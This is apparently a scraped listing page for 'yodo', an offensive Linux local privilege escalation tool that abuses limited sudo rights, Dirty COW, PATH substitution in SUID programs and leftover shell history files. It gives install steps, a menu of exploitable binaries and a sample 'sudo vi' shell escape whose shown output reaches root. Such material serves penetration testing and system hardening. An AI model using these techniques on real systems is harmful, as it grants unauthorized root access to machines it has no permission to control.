yodo: Local Privilege Escalation
iSpeech
yodo proves how easy it is to become root via limited sudo permissions, via dirty COW or using Pa(th)zuzu.
dirty COW: exploits a race condition in the implementation of the copy-on-write mechanism Link: https://dirtycow.ninja
Pa(th)zuzu: Checks for PATH substitution vulnerabilities, logs the commands executed by the vulnerable executables and injects commands with the permissions of the owner of the process (SUID) Link: https://github.com/ShotokanZH/Pa-th-zuzu
Extra features
VSP: checks if the user is able to overwrite a sudo-enabled command with his own
History: checks for * history (like bash_history) files. You could be lucky!
b3: tries to substitute commands that has root privileges [sudo -l >>> User may run the following commands … (root) NOPASSWD: /path/to/script]
Example: If a user has sudo privileges only on vi, he could become root by running this command: sudo vi -c ‘:shell’
b3rito@victim ~/Desktop $ sudo vi -c ‘:shell’
[sudo] password for b3rito:
victim Desktop # whoami
root
Installation
git clone https://github.com/b3rito/yodo.git
chmod +x yodo.sh
Usage
[adsense size='1' ]
./yodo.sh
Possible options (‡ excluded):
[·] find
[·] vi
[·] b3Select From the menu:
1) Find 8) Man * 17) Pathzuzu °‡
2) AWK 10) Dirty COW °‡ 18) History °‡
3) Nmap 11) Gdb 19) Vim
4) Vi 12) Ruby 20) Lua
5) Python 13) b3 21) Ftp *
6) Irb 14) Perl 22) Credits
7) Less * 15) Tee 23) Update
8) More * 16) VSP °‡ 99) ExitVSP = Vulnerable Script Permissions
Pathzuzu = SUID exploitation through Path vulnerability
b3 = editable root privileged commands listed in ‘sudo -l’
* user interatcion
° sudo not required
Enter Number: 1
[sudo] password for b3rito:
victim Desktop # whoami
root
victim Desktop #
Author
Written by b3rito at mes3hacklab
Source: https://github.com/b3rito/
Gloss